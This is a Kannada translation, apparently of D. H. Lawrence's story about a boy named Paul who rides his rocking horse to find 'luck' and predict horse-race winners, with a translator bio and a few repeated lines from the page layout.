ಕೊನೆಗೂ ಕಾದಂಬರಿ ವಿಚಾರಣೆಯಲ್ಲಿ ಗೆದ್ದು ಪ್ರಕಟನೆಗೆ ಅರ್ಹವೆಂದು ತೀರ್ಮಾನವಾಯಿತು. ಪೆಂಗ್ವಿನ್ ಸಂಸ್ಥೆಯು ಈ ಕಾದಂಬರಿಯ ತನ್ನ ಎರಡನೇ ಮುದ್ರಣದಲ್ಲಿ ‘ನ್ಯಾಯವಿಚಾರಣೆಯಲ್ಲಿ ಈ ಕೃತಿಯನ್ನು ಪಾಸು ಮಾಡಿದ ಹನ್ನೆರಡು ಜನ ನ್ಯಾಯಾಧೀಶರಿಗೆ (ಮೂವರು ಮಹಿಳೆಯರು, ಒಂಭತು ಜನ ಪುರುಷರು) ಈ ಕಾದಂಬರಿಯನ್ನು ಅರ್ಪಿಸಲಾಗಿದೆ. ಇದರಿಂದಾಗಿ ಲಾರೆನ್ಸ್‍ನ ಕೊನೆಯ ಕಾದಂಬರಿ ಓದುಗರಿಗೆ ಲಭ್ಯವಾಗುವಂತಾಯಿತು’ ಎಂದು ಹೇಳಿಕೊಂಡಿತು. ಲೇಖಕನು ಸತ್ತ ಮೇಲೆಯೇ ಆತನಿಗೆ ಅಪಾರ ಪ್ರಸಿದ್ಧಿ ಬಂದಿತು. ಕನ್ನಡದ ಪುಟ್ಟಣ್ಣ ಕಣಗಾಲ್ ಅವರ “ಎಡಕಲ್ಲು ಗುಡ್ಡದ ಮೇಲೆ” ಚಿತ್ರ ಹಾಗೂ ಹರಿಹರನ್ ನಿರ್ದೇಶನದ ಮಲಯಾಳಮ್ ಸಿನೆಮಾ “ಶರಪಂಚರಮ್”ಗಳು ಈ ಕೃತಿಯನ್ನು ಆಧರಿಸಿ ನಿರ್ಮಾಣ ಮಾಡಿದ್ದು ಎಂದು ನಂಬಲಾಗಿದೆ.

“ನಾವು ತಗೋಳಿಕ್ಕೆ ಸಾಧ್ಯ ಇಲ್ಲ, ಪಾಲ್. ಯಾಕಂದ್ರ ನಾವು ಬಡವರು ಅದೇವಿ..”

‘ಅದ ಬಡವರು ಯಾಕ ಆಗೇವಿ..’

“ಅದಕ್ಕ ನೂರಾ ಎಂಟು ಕಾರಣ ಅದಾವ.. ಬಾಳ ಮುಖ್ಯ ಕಾರಣ ಅಂದ್ರ ನಿಮ್ಮಪ್ಪ. ಅಂವಗ ಅದೃಷ್ಟ ಅನ್ನೋದ ಇಲ್ಲ..” ಗಂಡನನ್ನು ತೆಗಳಲಿಕ್ಕೆ ಅವಳಿಗೆ ಹೊತ್ತು-ಗೊತ್ತು ಎನ್ನುವುದು ಇರಲಿಲ್ಲ.

ಹುಡುಗ ಒಂದು ಕ್ಷಣ ಸುಮ್ಮನಾಗಿ ಪೆದ್ದನಂತೆ ಕೇಳಿದ: ‘ಓಹೋ! ಹಂಗಾದ್ರ ಹಣ ಇದ್ರ ಅದೃಷ್ಟ ಇದ್ದಾಂಗ.. ಅಲ್ಲ?’

ತಾಯಿ ಹೇಳಿದಳು: “ಹಂಗಲ್ಲೋ ಪಾಲ್.. ಆದರ ನಮ್ಮ ಜೀವನದಾಗ ಲಕ್ ಅನ್ನೋದು ಇದ್ರ ದುಡ್ಡು ಹೆಂಗಾದ್ರೂ ಬರ್ತದ..”

‘ಆಸ್ಕರ್ ಮಾಂವ ಒಂದು ಸಲ ‘ಹಾಳಾದ್ದ ಲಕರ್’ ಅಂತ ಲಕ್‍ಗೆ ಬೈಯತಿದ್ದ…’

“ಅಲ್ಲ, ಆಸ್ಕರ್ ಅಂದುಕೊಂಡಿದ್ದು ಲುಕರ್. ಲಕ್ ಅಲ್ಲ. ಲುಕರ್ ಅಂದ್ರ ಪಾಪದ ಹಣ.. ಹೆಂಗೆಂಗೋ ಸಂಪಾದಿಸಿದ್ದು ಅಂತ.. ಆದರ ಪಾಲ್, ಕೇಳಿಲ್ಲಿ. ನಾ ಹೇಳೋದೇನು ಗೊತೈತೇನು? ಜೀವನದಾಗ ಏನೇ ಇಲ್ಲದಿದ್ರೂ ನಸೀಬ್ ಇರಬೇಕಂತ..” ತನ್ನ ತಮ್ಮನನ್ನು ತೆಗಳಬೇಕೋ, ಹೊಗಳಬೇಕೋ ಆಕೆಗೆ ತಿಳಿಯಲಿಲ್ಲ. ಈ ಮನೆಗೆ ಅವನ ಹಾಜರಾತಿ ಆಗಾಗ ಇದ್ದದ್ದೇ.

‘ಅಂದ್ರ’

“ಅಂದ್ರ ನಾವು ನಸೀಬವಂತರಾಗಿದ್ರ, ದುಡ್ಡು ಹೆಂಗಾದ್ರೂ ಬರ್ತದ. ನಾವು ಶ್ರೀಮಂತರಾಗಿರೋದಕ್ಕಿಂತ ಅದೃಷ್ಟವಂತರಾಗಿರೋದು ಮುಖ್ಯ. ಒಬ್ಬ ಶ್ರೀಮಂತ ತನ್ನ ದುಡ್ಡನ್ನ ಕಳಕೊಳ್ಳಬಹುದು. ಆದರ ಅಕಸ್ಮಾತ್ ನಿನ್ನ ಕಡೆ ಅದೃಷ್ಟ ಇತ್ತಂದ್ರ ದುಡ್ಡು ಅನ್ನೋದು ತನ್ನಿಂತಾನೇ ಜಾಸ್ತಿ ಆಗ್ತಾ ಹೋಗ್ತದ..”

‘ಅಂದ್ರ ಅಪ್ಪನಿಗೆ ಅದೃಷ್ಟ ಇಲ್ಲ ಅಂದಂಗಾತು..’

“ಅವನು ದುರದೃಷ್ಟವಂತ ಅದಾನ.. ಬಾಳ ಬಾಳ ದುರದೃಷ್ಟವಂತ..”

‘ಯಾಕೊ?’

“ಯಾಕಂತ ಹೇಳಲಿಕ್ಕೆ ಆಗೋದಿಲ್ಲ. ಒಬ್ಬರಿಗೆ ಚೂರಂದ್ರ ಚೂರೂ ನಸೀಬ್ ಇರೋದಿಲ್ಲ, ಮತ್ತೊಬ್ಬರಿಗೆ ಇರ್ತದ.. ಅದು ಹೆಂಗ ಮತ್ತ ಯಾಕ ಅಂತ ಹೇಳಲಿಕ್ಕೆ ಆಗಂಗಿಲ್ಲ…”

“ಇಲ್ಲ. ನಾ ಅನ್‍ಲಕಿ ಅಲ್ಲ. ಆದರ ಅದೃಷ್ಟ ಇಲ್ಲದಂಥ ಒಬ್ಬ ಬೇಕೂಫನನ್ನ ನಾ ಮದುವಿ ಆದೆ.. ಮದುವಿ ಆಗೋದಕ್ಕಿಂತ ಮೊದಲು ನಾನು ಅದೃಷ್ಟವಂತಳಿದ್ದೆ. ಮದುವಿ ಆದ ಮ್ಯಾಲ ಖರೇನ ನನ್ನ ನಸೀಬು ಕೆಟ್ಟ ಆಗೇತಿ… ಇರಲಿ ಬಿಡು,

‘ನಸೀಬ್ ಯಾಕ ಬರ್ತದ, ಯಾಕ ಹೋಗ್ತದ ಅನ್ನೋ ಕಾರಣ ಯಾರಿಗೂ ಗೊತ್ತಾಗಲಿಕ್ಕೆ ಸಾಧ್ಯ ಇಲ್ಲವೇ ಇಲ್ಲ ಅಂತಿಯೇನಮ್ಮ?’

“ಹೌದು. ಅಕಸ್ಮಾತ್ ಗೊತ್ತಾದ್ರೂ ದೇವರಿಗೆ ಮಾತ್ರ ಗೊತ್ತಾಗ್ತದ…”

‘ನೀನೂ ಅನ್‍ಲಕಿ ಏನಮ್ಮ?’ ಮಗನ ಬಾಯಿಯಿಂದ ಒಮ್ಮೆಲೆ ಬಂದು ಮಾತು ಅವಳ ಎದೆಗೆ ಭರ್ಚಿಯಂತೆ ಚುಚ್ಚಿತು.

“ಇಲ್ಲ. ನಾ ಅನ್‍ಲಕಿ ಅಲ್ಲ. ಆದರ ಅದೃಷ್ಟ ಇಲ್ಲದಂಥ ಒಬ್ಬ ಬೇಕೂಫನನ್ನ ನಾ ಮದುವಿ ಆದೆ.. ಮದುವಿ ಆಗೋದಕ್ಕಿಂತ ಮೊದಲು ನಾನು ಅದೃಷ್ಟವಂತಳಿದ್ದೆ. ಮದುವಿ ಆದ ಮ್ಯಾಲ ಖರೇನ ನನ್ನ ನಸೀಬು ಕೆಟ್ಟ ಆಗೇತಿ… ಇರಲಿ ಬಿಡು, ಅದನ್ನ ತಗೊಂಡು ನೀನು ಏನು ಮಾಡಾಂವ ಅದಿ, ನೀ ಬಾಳ ಸಣ್ಣಂವ ಅದೀ. ಬಾಳ ಅಂದ್ರ ಬಾಳ ಸಣ್ಣಂವ…” ತಾಯಿ ತನ್ನಿಂದ ಏನೋ ಮುಚ್ಚಿಡುತ್ತಿದ್ದಾಳೆಂದು ಮಗುವಿಗೆ ಅನಿಸಿತು.

‘ಅವ್ವ, ನೀ ತಿಳಕೊಂಡಂಗ ಇಲ್ಲ. ನನಗ ಎಲ್ಲಾ ತಿಳಿಲಿಕ್ಕೆ ಹತ್ತೇದ… ನನಗ ಏನ್ ಅನಿಸಲಿಕ್ಕೆ ಹತ್ತೇದಂದ್ರ ನಾನು ಅದೃಷ್ಟವಂತ ಅದೇನಿ…’

“ನೀನಾ? ನೀನು ಅದೃಷ್ಟವಂತ?” ತಾಯಿ ಒಮ್ಮೆಲೆ ನಕ್ಕಳು. ಅವಳ ನಗು ನಿಲ್ಲಲೇ ಇಲ್ಲ. ಮಗನ ಮಾತು ಅವಳಿಗೆ ಮಜಾ ಅನಿಸಿತು.

ಆ ಮಾತನ್ನು ತಾನು ಯಾಕೆ ಹೇಳಿದೆನೆಂದು ಬಾಲಕನಿಗೆ ಆಶ್ಚರ್ಯವಾಗಿತ್ತು: ‘ದೇವರೇ ಬಂದು ನನಗೆ ಹೇಳಿದ. ನಾನು ಬಾಳ ಅದೃಷ್ಟವಂತ ಅಂತ..’

ನಸೀಬ್‍ನ್ನು ಹೇಗಾದರೂ ಸಂಪಾದಿಸಲೇ ಬೇಕು ಎಂಬ ಹಟ ಅವನಲ್ಲಿ ಹುಟ್ಟಿತು. ಯಾವುದೇ ಬೆಲೆ ತೆತ್ತಾದರೂ ತನ್ನ ಕಡೆ ಲಕ್ ಇದೆ ಎಂದು ತೋರಿಸಬೇಕು. ತಾಯಿಗೆ ತನ್ನ ಮಹತ್ವವನ್ನು ತಿಳಿಯಗೊಡಬೇಕು.

“ಚೊಲೋ ಆತು ಬಿಡು.. ಈ ಮನ್ಯಾಗ ಅದೊಂದು ಕಡಿಮೆಯಾಗಿತ್ತು ನೋಡು.” ಗಂಡ ತನಗೆ ಯಾವಾಗಲೂ ಹೇಳುತ್ತಿದ್ದ ಮಾತನ್ನು ಈಗ ಅವಳು ಹೇಳಿದಳು. ಅದು ಒಂದು ರೀತಿ ಎದುರಿಗಿದ್ದವರನ್ನು ಅಲಕ್ಷ್ಯ ಮಾಡುವಂತಹ ಮಾತು. ಅವಮಾನ ಮಾಡುವಂತಹ ಮಾಡು. ಈ ಮನೆಯಲ್ಲಿ ಬರೀ ಸಂಕಷ್ಟಗಳೆ ತುಂಬಿವೆ ಎಂದು ಹೇಳುವ ಮಾತು.

ತನ್ನ ಮಾತನ್ನು ತಾಯಿ ನಂಬಲಿಲ್ಲವೆಂದು ಅವನಿಗೆ ಮನದಟ್ಟಾಯಿತು. ಸಿಟ್ಟು ಮಾಡಿಕೊಂಡವನಂತೆ ಅಲ್ಲಿಂದ ತೆರಳಿದ. ಆಮೇಲೆ ಅವನಿಗೆ ಅದೃಷ್ಟ ಎಂಬ ಸಂಗತಿಯೇ ಕುಂತಲ್ಲಿ, ನಿಂತಲ್ಲಿ, ಮಲಗಿದಲ್ಲಿ ಕೊರೆಯತೊಡಗಿತು. ಹುಡುಗ ಒಂಥರಾ ನಿಗೂಢನಾದ. ನಸೀಬ್‍ನ್ನು ಹೇಗಾದರೂ ಸಂಪಾದಿಸಲೇ ಬೇಕು ಎಂಬ ಹಟ ಅವನಲ್ಲಿ ಹುಟ್ಟಿತು. ಯಾವುದೇ ಬೆಲೆ ತೆತ್ತಾದರೂ ತನ್ನ ಕಡೆ ಲಕ್ ಇದೆ ಎಂದು ತೋರಿಸಬೇಕು. ತಾಯಿಗೆ ತನ್ನ ಮಹತ್ವವನ್ನು ತಿಳಿಯಗೊಡಬೇಕು. ಅವನ ಅಕ್ಕತಂಗಿಯರು ತಮ್ಮ ಗೊಂಬೆಗಳೊಡನೆ ಆಡುತ್ತಿದ್ದರೆ ಈ ಹುಡುಗ ತನ್ನ ಕಟ್ಟಿಗೆಯ ಕುದುರೆಯನ್ನು ಏರಿ ಅದನ್ನು ಆಕಾಶದತ್ತ ಓಡಿಸಿದಂತೆ ಮಾಡುವನು: “ಓಡು, ಓಡು, ನಸೀಬ್ ಎಲ್ಲೈತೋ ಅಲ್ಲಿಗೆ ಓಡು…” ಅವನ ದಟ್ಟ ಕಪ್ಪು ಕೂದಲು ಗಾಳಿಯಲ್ಲಿ ಹಾರುವುದು. ಅವನ ಕಣ್ಣುಗಳಲ್ಲಿ ಒಂದು ರೀತಿಯ ವಿಚಿತ್ರ ನಶೆ ತುಂಬಿಕೊಳ್ಳುವುದು. ಅವನು ಕುದುರೆ ಓಡಿಸುವಾಗ ಅವನ ಸಹೋದರಿಯರಂತೂ ಅವನತ್ತ ನೋಡಲು ಹೆದರುತ್ತಿದ್ದರು.

ಕುದುರೆ ಓಡಿಸಿ ಓಡಿಸಿ ಸಾಕೆನಿಸಿದಾಗ ಅವನು ಇಳಿಯುತ್ತಿದ್ದ. ಕೆಳಗೆ ಮುಖ ಹಾಕಿದ, ಹೊಳೆಯುವ ಕಣ್ಣಿನ, ಬಾಯಿ ತೆರೆದ ಆ ಅಶ್ವವನ್ನು ನೋಡುತ್ತ ನಿಲ್ಲುತ್ತಿದ್ದ. ಏದುಸಿರು ಬಿಡುತ್ತಿರುವ ಅದಕ್ಕೆ ಆಜ್ಞೆ ಮಾಡುತ್ತಿದ್ದ: ‘ನಡಿ, ಈ ಜಗತ್ತಿನ್ಯಾಗ ಲಕ್ ಎಲ್ಲಿದೆಯೋ ಅಲ್ಲಿಗೆ ನನ್ನ ಕರಕೊಂಡು ನಡಿ…’ ಮಾವನಿಗೆ ಹೇಳಿ ತರಿಸಿದ್ದ ಬಾರುಕೋಲಿನಿಂದ ಅದರ ಬೆನ್ನ ಮೇಲೆ, ಕೊರಳ ಸುತ್ತ ಹೊಡೆಯುತ್ತಿದ್ದ. ಅದಕ್ಕೆ ಒತ್ತಾಯ ಮಾಡಿದರೆ ಅದೃಷ್ಟ ಇರುವಲ್ಲಿಗೆ ಈ ಕುದುರೆ ತನ್ನನ್ನು ಕರೆದುಕೊಂಡು ಹೋಗಬಲ್ಲುದೆಂದು ಆ ಹುಡುಗ ನಂಬಿದ್ದ. ಮತ್ತೆ ಅದರ ಬೆನ್ನ ಮೇಲೆ ಕುಳಿತು ಮತ್ತೊಂದು ಸವಾರಿಗೆ ಸಿದ್ಧನಾಗುತ್ತಿದ್ದ.

“ಏಯ್ ಪಾಲ್, ಆ ಕುದುರಿಗೆ ಸ್ವಲ್ಪ ವಿಶ್ರಾಂತಿ ಕೊಡು. ಯಾವಾಗ ನೋಡಿದರೂ ಆವಾಗ ನೀ ಹೀಂಗ ಕುದುರಿ ಏರಿದರ ಅದರ ಗತಿ ಏನಾಗ್ತದ? ಆ ಕುದುರಿ ಮುರಿದು ಹೋಗ್ತದ..” ಮಕ್ಕಳನ್ನು ನೋಡಿಕೊಳ್ಳಲು ನೇಮಕವಾಗಿದ್ದ ನರ್ಸ್ ಹೇಳುತ್ತಿದ್ದಳು.

‘ಆಂವ ಯಾವಾಗ ನೋಡಿದರೂ ಕುದುರಿ ಮ್ಯಾಲ ಕುಂತರತಾನ, ಅದನ್ನ ಸವಾರಿ ಮಾಡ್ತಿರತಾನ.. ಈ ಹಾಳಾದ ಕುದುರಿಯನ್ನ ಎಂದ ಬಿಡ್ತಾನೋ ಗೊತ್ತಿಲ್ಲ..’ ಬಾಲಕನ ಅಕ್ಕ ಕಾಳಜಿಯಿಂದೆಂಬಂತೆ ಹೇಳುವಳು. ಸಹೋದರಿಯರು ಏನೇ ಹೇಳಿದರೂ ಅವನು ತನ್ನ ವಿಚಿತ್ರ ಮೌನದಿಂದ ಅವರನ್ನು ಅಲಕ್ಷ್ಯ ಮಾಡುತ್ತಿದ್ದ. ನರ್ಸ್ ಇವನಿಗೆ ಹೇಳಿ ಹೇಳಿ ದಣಿದಿದ್ದಳು. ಹೀಗಾಗಿ ಅವಳು ಇತ್ತೀಚೆಗೆ ಈ ಹುಡುಗನಿಗೆ ಹೇಳುವುದನ್ನೆ ಬಿಟ್ಟಿದ್ದಳು. ಹೇಳುವ-ಕೇಳುವ ವಯಸ್ಸನ್ನು ಈ ಹುಡುಗ ದಾಟಿದ್ದಾನೆ ಎಂದು ನರ್ಸ್ ಅಂದುಕೊಳ್ಳುವಳು.

ಒಂದು ದಿನ ಆತ ತನ್ನ ಕುದುರೆಯನ್ನು ಜೋರಾಗಿ ಓಡಿಸುತ್ತಿದ್ದಾಗ ಅವನ ತಾಯಿ ಮತ್ತು ಅವನ ಮಾವ ಆಸ್ಕರ್ ಕೋಣೆಯೊಳಗೆ ಬಂದರು.

‘ಏನೋ ಕುದುರೆ ಸವಾರ? ಮರಗುದುರಿ ಮ್ಯಾಲ ಕುಂತೀಯಲ್ಲೋ? ಜೀವಂತ ಕುದುರಿ ಏರಬೇಕೆನಪಾ..!’ ಮಾವನ ಪ್ರಶ್ನೆ. ಇಷ್ಟು ದೊಡ್ಡವನಾದರೂ ಇನ್ನೂ ಕಟ್ಟಿಗೆಯ ಕುದುರೆಯ ಮೇಲೆ ಸವಾರಿ ಮಾಡುತ್ತಿದ್ದ ಹುಡುಗನನ್ನು ಕಂಡು ಅವನು ಹೀಯಾಳಿಸಿದಂತಿತ್ತು.

“ಏಯ್ ಪಾಲ್, ಇಷ್ಟು ದೊಡ್ಡ ಹುಡುಗ ಆಗಿದೀಯ. ಕಟ್ಟಿಗೆ ಕುದುರಿ ನಿನಗ ಸಣ್ಣದು ಅನಿಸವಲ್ಲದೇನು? ಅದರ ಮ್ಯಾಲ ಹೆಂಗ ಕುಂಡ್ರತಿ? ನೀನೀಗ ಸಣ್ಣ ಹುಡುಗ ಅಲ್ಲ ಪಾಲ್..” ತಾಯಿ ದನಿಗೂಡಿಸಿದಳು.

ಸವಾರಿಯ ಉತ್ತುಂಗ ಸ್ಥಿತಿಯಲ್ಲಿರುವಾಗ ಹುಡುಗ ಯಾವುದಕ್ಕೂ ಉತ್ತರ ನೀಡುವುದಿಲ್ಲ. ತನ್ನ ನೀಲಿ ತೇಲುಗಣ್ಣುಗಳಿಂದ ಅವರನ್ನು ನೋಡಿ ಸುಮ್ಮನಾದ. ಅದನ್ನು ನೋಡಿ ಅವ್ವನಿಗೆ ಒಂಥರಾ ಭಯವೆನಿಸಿತು. ಕೊನೆಗೆ ಅವನು ನಿಲ್ಲಿಸಿ ಅದರ ಮೇಲಿಂದ ಕೆಳಗೆ ಜಿಗಿದು ನಿಂತ: ‘ಅಂತೂ ನಾನು ಮುಟ್ಟಬೇಕಾದುದನ್ನು ಮುಟ್ಟಿದೆ..’ ಕಾಲು ಅಗಲ ಮಾಡಿಕೊಂಡು ನಿಂತಂತೆಯೇ ಆತ ಹೇಳಿದ.

“ಏನು ಮುಟ್ಟಿದೆಯೋ..” ತಾಯಿಯ ಪ್ರಶ್ನಾರ್ಥಕ ಮಾತು. ‘ನಾ ಎಲ್ಲಿಗೆ ಹೋಗಬೇಕಾಗಿತ್ತೋ ಅಲ್ಲಿಗೆ ಹೋಗಿಬಂದೆ..’

‘ಪಾಲ್, ನಿನ್ನ ಮಾತು ಸರಿ.. ನಾವು ಗುರಿ ಮುಟ್ಟೋವರೆಗೂ ನಿಲ್ಲಬಾರದು. ಏನು ನಿನ್ನ ಕುದುರಿ ಹೆಸರು..’ ಮಾಂವ ಕೇಳಿದ.

‘ಹಂಗ ನೋಡಿದ್ರ ನನ್ನ ಕುದರಿಗೆ ಹೆಸರಿಲ್ಲ. ಆದರ ಬ್ಯಾರೆ ಬ್ಯಾರೆ ಹೆಸರಿನಿಂದ ಅದು ಗುರುತಿಸಿಕೊಳ್ತದ.. ಹೋದ ವಾರ ಅದರ ಹೆಸರು ಸ್ಯಾನ್ಸ್‍ವಿನೋ ಅಂತ ಇತ್ತು..’

‘ಹಾಂ! ಸ್ಯಾನ್ಸ್‍ವಿನೋ!’ ಮಾವನಿಗೆ ಒಮ್ಮೆಲೆ ಕರೆಂಟ್ ಹೊಡೆದಂತಾಯಿತು. ಈ ಬಾಲಕನಿಗೆ ಆ ಹೆಸರು ಹೇಗೆ ಗೊತ್ತಾಯಿತೆಂದು ಆಸ್ಕರ್ ಆಶ್ಚರ್ಯಪಡತೊಡಗಿದ್ದ: ‘ಹೋದ ಸಲ ಸ್ಯಾನ್ಸ್‍ವಿನೋ ಹೆಸರಿನ ಕುದುರೆ ರೇಸನಲ್ಲಿ ಗೆದ್ದಿತ್ತು. ಅದರ ಹೆಸರು ನಿನಗ ಹೆಂಗ ಗೊತ್ತಾತು?’

ಡಾ.ಬಸು ಬೇವಿನಗಿಡದ

ಡಾ.ಬಸು ಬೇವಿನಗಿಡದ ಅವರು ಕವಿ,ಕತೆಗಾರರು ಹಾಗೂ ಅನುವಾದಕರು. ಧಾರವಾಡದ ಕರ್ನಾಟಕ ವಿಶ್ವವಿದ್ಯಾಲಯದಿಂದ ಎಂ.ಎ ಇಂಗ್ಲಿಷ್ ಪದವಿ ಮತ್ತು ಹಂಪಿಯ ಕನ್ನಡ ವಿಶ್ವವಿದ್ಯಾಲಯದಿಂದ ಬೇಂದ್ರೆ ಕಾವ್ಯದ ಮೇಲೆ ಪಿಎಚ್.ಡಿ ಪದವಿ ಪಡೆದಿದ್ದಾರೆ.

‘ಕನಸು’ ಮತ್ತು ‘ಇಳೆಯ ಅರ್ಥ’ ಅವರ ಕವನ ಸಂಕಲನಗಳು. ‘ತಾಯವ್ವ’, ‘ಬಾಳೆಯ ಕಂಬ’, ‘ಹೊಡಿ ಚಕ್ಕಡಿ’ ಹಾಗೂ ‘ಉಗುಳುಬುಟ್ಟಿ’-ಇವು ಅವರ ಕಥಾ ಸಂಕಲನಗಳು. ಕರ್ನಾಟಕ ಸಾಹಿತ್ಯ ಅಕಾಡೆಮಿಯ ಪುಸ್ತಕ ಬಹುಮಾನ, ಕನ್ನಡ ಪುಸ್ತಕ ಪ್ರಾಧಿಕಾರ, ಕನ್ನಡ ಸಾಹಿತ್ಯ ಪರಿಷತ್ತು, ಜಿ.ಬಿ.ಹೊಂಬಳ ರಾಜ್ಯಮಟ್ಟದ ಮಕ್ಕಳ ಸಾಹಿತ್ಯ ಪ್ರಶಸ್ತಿ, ಬೆಳಗಾವಿಯ ಹರ್ಡೇಕರ್ ಮಂಜಪ್ಪ ಪ್ರಶಸ್ತಿ, ಸೇಡಂನ ಅಮ್ಮ ಪ್ರಶಸ್ತಿ, ತುಮಕೂರಿನ ವೀಚಿ ಸಾಹಿತ್ಯ ಪ್ರಶಸ್ತಿ, ಬಾಗಲಕೋಟೆಯ ತೇಜಸ್ವಿ ಕಟ್ಟೀಮನಿ ಪ್ರಶಸ್ತಿ, ಗಾಂಧಿ ಕಥಾ ಪ್ರಶಸ್ತಿ ಸೇರಿದಂತೆ ಹಲವು ಪುರಸ್ಕಾರ-ಬಹುಮಾನಗಳು ಇವರಿಗೆ ಸಂದಿವೆ. ಪ್ರಸ್ತುತ ಧಾರವಾಡ ಆಕಾಶವಾಣಿಯಲ್ಲಿ ಕಾರ್ಯಕ್ರಮ ಅಧಿಕಾರಿ.

ಹುಡುಗನ ಬದಲಿಗೆ ಈಗ ಅವನ ಅಕ್ಕ ಬಾಯಿ ತೆರೆದಳು. ತನ್ನ ತಮ್ಮ ಯಾವಾಗಲೂ ಈ ಮರದ ಕುದುರೆಯನ್ನೇರಿ ದಣಿವಾಗುವವರೆಗೂ ಅದನ್ನು ಓಡಿಸುವುದು, ಅದರ ಮೇಲೆ ಕುಳಿತುಕೊಂಡು ಏನೇನೋ ಹೇಳುವುದು, ದೇಹದ ಸ್ತಿಮಿತ ತಪ್ಪಿದವರಂತೆ ಹೇಗೇಗೋ ಮಾಡುವುದು ಅವಳಲ್ಲಿ ಹೆದರಿಕೆ ಹುಟ್ಟಿಸಿತ್ತು. ತಮ್ಮನ ಮೇಲೆ ಕಂಪ್ಲೇಂಟ್ ಹೇಳುವುದಕ್ಕೆ ಅವಳಿಗೆ ಅವಕಾಶ ದೊರಕಿತ್ತು. ‘ಈ ನಮ್ಮ ಪಾಲ್ ಅದಾನಲ್ಲ, ಇಂವ ಯಾವಾಗಲೂ ನಮ್ಮ ತೋಟದಾಳು ಬ್ಯಾಸೆಟ್‍ನ ಜೊತೆ ಕುದುರೆ ರೇಸಿನ ಬಗ್ಗೆ ಮಾತಾಡ್ತಿರತಾನು..’ ಪಾಲ್‍ನ ಅಕ್ಕ ಜೋನ್ ತಮ್ಮನ ಬಗ್ಗೆ ದೂರು ಕೊಡುವ ರೀತಿಯಲ್ಲಿ ಹೇಳಿದಳು. ತನ್ನ ಅಕ್ಕನ ಮಗನಿಗೆ ಕುದುರೆ ರೇಸ್‍ಗಳ ಬಗ್ಗೆ ಮಾಹಿತಿಯಿರುವುದು ಕೇಳಿ ಆಸ್ಕರ್ ಮಾವನಿಗೆ ಸಂತೋಷವಾಯಿತು. ಯುದ್ಧದಲ್ಲಿ ಗಾಯಗೊಂಡು ನಿವೃತ್ತನಾಗಿದ್ದ ಬ್ಯಾಸೆಟ್ ಆಸ್ಕರ್‍ನ ಮೂಲಕವೇ ಇವರ ಮನೆಯಲ್ಲಿ ಮಾಲಿಯಾಗಿ ಕೆಲಸಕ್ಕೆ ಸೇರಿಕೊಂಡಿದ್ದು. ಬ್ಯಾಸೆಟ್‍ನಿಗೆ ಕುದುರೆ ಜೂಜಿನ ಹುಚ್ಚು ಇದೆಯೆಂದು, ಜೂಜಿನಲ್ಲಿ ಒಳ್ಳೆಯ ಪರಿಣತನೆಂದು ಆಸ್ಕರ್‍ನಿಗೆ ಗೊತ್ತು. ಆದರೆ ಇದರಲ್ಲಿ ಇನ್ನೂ ಸಣ್ಣಹುಡುಗನಾಗಿರುವ ಪಾಲ್ ಕೂಡ ಸೇರಿಕೊಂಡಿದ್ದಾನೆಂದು ತಿಳಿದಾಗ ಅವನಿಗೆ ಆಶ್ಚರ್ಯವಾಯಿತು. ಯಾವಾಗ ಆಸ್ಕರ್ ಇದರ ಬಗ್ಗೆ ಬ್ಯಾಸೆಟ್‍ನನ್ನು ವಿಚಾರಿಸಿದನೋ ಆವಾಗ ಆತ ಗಡಗಡ ನಡುಗಿದ: ‘ಇಲ್ಲ ಸಾಯೇಬ್ರೆ, ನನಗ ಏನೂ ಗೊತ್ತಿಲ್ಲ. ನಾನು ಅಮಾಯಕ. ಆದರೆ ಆ ಹುಡುಗ ಪದೇಪದೇ ಬಂದು ಕೇಳಿದಾಗ ನಾ ಇಲ್ಲ ಅಂತ ಹೆಂಗ ಹೇಳಲಿ?’

“ಅಂವನೂ ಇದರಾಗ ದುಡ್ಡು ಹಾಕತಾನೇನು?”

“ಅದು ನನಗ ಗೊತ್ತಿಲ್ಲ. ಪಾಪ, ಸಣ್ಣ ಹುಡುಗ ಏನೋ ಹುಡುಗಾಟಿಕೆ ಅಂತ ಆಡ್ತಾನು.. ಜಾಸ್ತಿ ಮಾಹಿತಿ ಬೇಕಾದ್ರ ನೀವು ಅಂವನ್ನ ಕೇಳ್ರಿ..’

ಆಸ್ಕರ್ ಒಂದು ಸಲ ಪಾಲ್‍ನನ್ನು ತನ್ನ ಕಾರಿನಲ್ಲಿ ಹಾಗೆಯೇ ಸುತ್ತಾಡಿಸಿಕೊಂಡು ಬರೋಣವೆಂದು ಹೇಳಿ ಕರೆದುಕೊಂಡು ಹೋದ.

‘ಏಯ್ ಪಾಲ್, ನೀನು ಕುದುರೆ ಜೂಜಿಗೆ ದುಡ್ಡು ಹಾಕತಾ ಇದೀಯಂತ ನನಗ ಗೊತ್ತಾತು.’

“ಯಾಕ, ನಾನು ಆಡಬಾರದು ಅಂತ ರೂಲ್ಸ್ ಏನಾದ್ರೂ ಐತೇನು?”

‘ಹಂಗಲ್ಲೋ, ಸುಮ್ಮನ ಕೇಳಿದೆ. ಈಗ ಸದ್ಯದಾಗ ಲಿಂಕನ್ ರೇಸ್ ಬರೋದು ಐತೆಲ್ಲ…ಅದರಾಗ ಯಾವ ಕುದುರೆ ಗೆಲ್ಲಬಹುದು ಅಂತೀಯ?’ ಮಾವನ ಕಾರು ತುಂಬ ವೇಗದಲ್ಲಿ ಹ್ಯಾಂಪ್‍ಶೈರ್‍ನಲ್ಲಿರುವ ಅವನ ಮನೆಯ ಕಡೆ ಓಡುತ್ತಿತ್ತು.

ಹುಡುಗ ಕೇಳಿದ: “ನಾ ಹೇಳಿದ್ದನ್ನ ಯಾರ ಮುಂದೂ ಹೇಳಂಗಿಲ್ಲ? ಅಲ್ಲ?”

‘ಖರೇನೋ ಪಾಲ್.. ನಾ ಯಾಕ ಹೇಳಲಿ? .ಪ್ರಾಮಿಸ್..’

“ಪ್ರಾಮಿಸ್”

‘ಪ್ರಾಮಿಸ್’

“ಹಂಗಾದ್ರ ಡೆಫೊಡಿಲ್ ಕುದುರೆ..”

‘ನನಗ್ಯಾಕೋ ಅದರ ಮ್ಯಾಲ ಸಂಶಯ. ಡೆಫೊಡಿಲ್ ಕುದುರಿ ಹೆಸರು ಯಾರೂ ಕೇಳೇ ಇಲ್ಲ. ಮಿರ್ಜಾ ಚೊಲೋ ಅನಸ್ತದ. ಎಲ್ಲಾರೂ ಈ ಸಲ ಮಿರ್ಜಾ ಗೆಲ್ಲಬಹುದಂತ ಅನ್ನಲಿಕ್ಕೆ ಹತ್ತ್ಯಾರ…’

